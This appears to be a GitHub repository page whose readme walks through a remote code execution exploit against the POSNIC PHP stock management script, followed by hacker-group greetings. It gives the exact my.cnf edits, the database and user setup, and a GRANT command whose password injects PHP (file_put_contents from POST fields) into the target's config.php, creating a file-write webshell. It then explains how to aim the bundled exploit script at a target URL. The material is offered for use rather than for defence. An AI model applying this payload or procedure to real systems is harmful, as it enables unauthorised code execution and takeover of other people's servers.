Skip to content

Files

Latest commit

 

History

History

POSNIC

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
SQL-Injection.php
SQL-Injection.php
 
 
posnic.png
posnic.png
 
 
posnic_exploit_code.php
posnic_exploit_code.php
 
 
readme.md
readme.md
 
 

readme.md

This script exploit remote code execution issue in POSNIC PHP stock management script. Vulnerability is in setup_page.php code. If CMS has been installed, still setup_page.php code allow user to reinstall CMS.

During installation process, script first try to connect MySQL server (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further.

Script save MySQL server host, username and password in config.php file.

Here attacker can take advantage of this process to write PHP code in config.php file.

To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file).

To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps

-> comment out skip-networking as well as bind-address (if any present in my.cnf )i.e change line

		skip-networking 
		to 
		# skip-networking

	and 

		bind-address    = some_ip
		to
		#bind-address = some_ip

save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP

Now, you need to create a MySQL user and database, follow these steps otherwise script won't be able to connect to MySQL server.

create database in MySQL server by issuing following command.

 create database owned;

Once database has been created, we need to create a user account which must follow these conditions.

 user acount = whatever you want

i am going to use user account name as 'owned'

 user account password = ";file_put_contents($_POST[2],$_POST[3]);//

 host from which this user will be allowed = %

lets suppose, server where posnic script is installed is having IP 192.168.56.102

so MySQL server command which create user account

grant all on database_name.* to username_of_user@% IDENTIFIED BY 'user account password';

in my case, here

	database_name = owned

	user account name = owned

	user account password= ";file_put_contents($_POST[2],$_POST[3]);//

final command will be like this

grant all on owned.* to owned@% IDENTIFIED BY '";file_put_contents($_POST[2],$_POST[3]);//';

after creating user account successfully, Run exploit code on your machine, fill the information like

-> target URL i.e Path to POSNIC script (in my case its http://127.0.0.1/stock/)
-> Attacker controlled MySQL host IP (IP of the server where attacker has configured MySQL server)
-> user account name of the attacker controlled MySQL Server (in my case, it was 'owned')

--==[[ Greetz To ]]==--

Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash

--==[[Love to]]==--

My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)